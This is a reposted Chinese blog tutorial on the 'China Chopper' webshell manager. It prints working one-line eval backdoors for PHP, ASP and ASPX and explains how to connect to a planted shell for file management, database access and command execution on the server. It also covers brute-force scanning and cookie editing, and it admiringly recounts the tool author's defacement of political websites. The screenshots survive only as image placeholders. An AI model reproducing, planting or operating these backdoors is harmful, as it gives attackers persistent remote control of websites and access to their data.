菜刀
转自:http://www.jianshu.com/p/f0797a485779
1.简单简绍
中国菜刀是一款专业的网站管理软件,用途广泛,使用方便,小巧实用。只要支持动态脚本的网站,都可以用中国菜刀来进行管理!在非简体中文环境下使用,自动切换到英文界面。
UINCODE方式编译,支持多国语言输入显示。(引用于百度百科中国菜刀
_百度百科)
作者:
说起菜刀,就不得不提起菜刀的作者,作者是一个退伍军人,生长在一个贫穷的农村,据说初中也没读完,英语更是不咋地,但他却自学掌握了
C++/J2ME/PHP/JSP/ASP.NET(C#,VB,C++,delphi,J#)/ASP/MySQL/MsSQL/Oracle/Informix/PostgreSQL/DB2/Sybase/Access/UNIX/LINUX/WIN/SEO/Flash(AS)/PhotoShop/Freehand
等等,当初在六七年前台湾闹独立的时候,他在国民党和民进党的网站上留下了“只有一个中国”的黑页,一举成名。
作者是一个朴实,低调的技术牛人,他这些年留下的作品很多,中国菜刀是他最新的一个作品,从他之前的作品WEBSHELL管理器的基础上修改而来,功能更加的强大。
你见过很强大的ASP后门,很强大的PHP后门,很强大的ASPX后门,那你见过很强大的asp,aspx,php三合一后门么……..,没有吧,尤其是这个后门,只有一句话。
Asp环境:<%eval request(“a”)%>
Php环境:<?php @eval($_POST[‘a’]);?>
Aspx环境:<% @page Language=”Jscript”><%eval(Request.item[“a”],”unsafe”);%>
Paste_Image.png
2.常见的管理
右键空白处->添加
Paste_Image.png
添加SHELL -> 进行相关的配置。
Paste_Image.png
我的配置:
地址:http://localhost/a.php
密码:
key
脚本类型:
PHP
最后
->点击添加
相关的介绍:
这里的
WEBSHELL是我们常说的一句话木马:
PHP一句话木马:<?php @eval($_POST['key']);?>
ASP一句话木马:<%eval request['key']%>
ASPX一句话木马:<%@ Page Language="Jscript"%><%eval(Request.Item["key"],"unsafe");%>
眼尖的童鞋已经看到了三个里面都带有
key这个单词,没错这个就是密码,大家可以自行修改为自己使用的密码。
功能概述:
Paste_Image.png
文件管理:
打开方式 [右键WEBSHELL->单击文件管理]
Paste_Image.png
管理方式 [右键上图中方框内的任何区域进行管理]
Paste_Image.png
数据库管理:
打开方式 [右键WEBSHELL->数据库管理]
Paste_Image.png
可以看到是空白的,这时候就需要配置数据库信息了。
配置方式1.[单击配置]
Paste_Image.png
出现了一个配置窗口。(前提你要有网站数据库的配置信息才可以进行配置)
我的配置信息:
数据库类型:Mysql
用户名:root
密码:root
配置方式 2.[选择数据库]
Paste_Image.png
可以看到红色方框那边有MYSQL、MSSQL、MSSQL2、ORACLE等数据库类型。
我是Mysql的就选择mysql的示例:
Paste_Image.png
配置后 [单击提交]:
Paste_Image.png
管理方式:
Paste_Image.png
虚拟终端:
打开方式 [右键WEBSHELL->单击虚拟终端]
Paste_Image.png
红色方框里是系统的一些信息。我们在D:\WWW>后面输入相应的cmd命令即可(Linux就输入shell命令)
2.网站扫描
打开方式 [单击菜刀图标->单击网站扫描]
Paste_Image.png
(也可以在软件里使用快捷键Alt+K去打开)
Paste_Image.png
使用方法:
把
http://www.http://maicaidao.com替换成自己的测试站点即可。
功能:
1.反向IP(reverse_ip)
2.爬虫(spider)
3.爆破(crack)
其他按照这些提示都应该能懂就不一一去说了。
3.浏览器功能
Paste_Image.png
打开方法如上图示意。
Paste_Image.png
对着网页进行右击:
Paste_Image.png
上图是一些浏览器方面的功能。
单击扩展功能:
Paste_Image.png
可以进行cookie的修改。
同时也可以单击菜刀图标->浏览器:
Paste_Image.png
可以进行选择:
代表开启 可以单击进行取消开启。
4.其他功能
第一:设置菜刀启动密码(防止自己的WEBSHELL泄露出去)
Paste_Image.png
打开方式 [单击菜刀图标->单击设置启动密码]
Paste_Image.png
点击是,就成功设置密码为test。
然后我们关掉菜刀再打开菜刀:
输入我们的密码再可以设置新的密码:
Paste_Image.png
我相信着点英语难不倒各位也不解释了。
也可以把启动密码取消掉:
作者:Adapa
链接:http://www.jianshu.com/p/f0797a485779
來源:简书
著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。